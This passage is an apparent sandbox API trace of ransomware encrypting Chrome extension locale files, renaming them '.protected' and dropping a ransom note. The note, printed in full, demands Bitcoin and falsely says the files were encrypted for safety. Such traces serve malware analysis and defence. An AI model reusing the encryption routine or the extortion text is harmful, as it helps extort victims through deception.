[0083.975] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.975] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.975] CloseHandle (hObject=0x164) returned 1 [0083.975] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.975] lstrcmpiW (lpString1="sw", lpString2="Windows") returned -1 [0083.975] lstrcmpiW (lpString1="sw", lpString2="Program Files") returned 1 [0083.975] lstrcmpiW (lpString1="sw", lpString2="Program Files (x86)") returned 1 [0083.975] lstrcmpiW (lpString1="sw", lpString2="$Recycle.bin") returned 1 [0083.975] lstrcmpiW (lpString1="sw", lpString2="System Volume Information") returned -1 [0083.975] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw") returned 150 [0083.975] lstrcmpW (lpString1="sw", lpString2=".") returned 1 [0083.975] lstrcmpW (lpString1="sw", lpString2="..") returned 1 [0083.975] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\*") returned 152 [0083.975] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.976] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.976] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.976] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.976] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.976] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.976] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\.") returned 152 [0083.976] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.976] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.976] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.976] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.976] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.976] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.976] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.976] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\..") returned 153 [0083.976] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.976] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.976] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.976] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.976] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.976] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.976] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.976] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.976] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json") returned 164 [0083.976] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.976] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.976] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.976] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.976] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.977] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json") returned 164 [0083.977] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.977] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json") returned 164 [0083.977] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.977] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json") returned 164 [0083.977] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.977] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.979] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.979] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.979] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.979] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.979] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.979] CloseHandle (hObject=0x168) returned 1 [0083.979] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json.protected") returned 174 [0083.979] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json.protected")) returned 1 [0083.980] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.980] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.980] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\RESTORE_FILES.txt") returned 168 [0083.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.980] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.980] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.981] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.981] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.981] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.981] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.982] CloseHandle (hObject=0x164) returned 1 [0083.982] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.982] lstrcmpiW (lpString1="ta", lpString2="Windows") returned -1 [0083.982] lstrcmpiW (lpString1="ta", lpString2="Program Files") returned 1 [0083.982] lstrcmpiW (lpString1="ta", lpString2="Program Files (x86)") returned 1 [0083.982] lstrcmpiW (lpString1="ta", lpString2="$Recycle.bin") returned 1 [0083.982] lstrcmpiW (lpString1="ta", lpString2="System Volume Information") returned 1 [0083.982] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta") returned 150 [0083.982] lstrcmpW (lpString1="ta", lpString2=".") returned 1 [0083.982] lstrcmpW (lpString1="ta", lpString2="..") returned 1 [0083.982] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\*") returned 152 [0083.982] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.982] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.982] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.982] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.982] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.982] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.982] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\.") returned 152 [0083.982] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.982] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.982] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.982] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.983] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.983] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.983] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.983] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\..") returned 153 [0083.983] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.983] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.983] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.983] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.983] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.983] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.983] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.983] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.983] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json") returned 164 [0083.983] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.983] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.983] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.983] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.983] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.984] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json") returned 164 [0083.984] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.984] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json") returned 164 [0083.984] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.984] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json") returned 164 [0083.984] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.984] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.986] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.986] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.986] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.986] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.986] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.986] CloseHandle (hObject=0x168) returned 1 [0083.986] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json.protected") returned 174 [0083.986] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json.protected")) returned 1 [0083.987] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.987] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.987] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\RESTORE_FILES.txt") returned 168 [0083.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.987] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.987] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.988] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.988] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 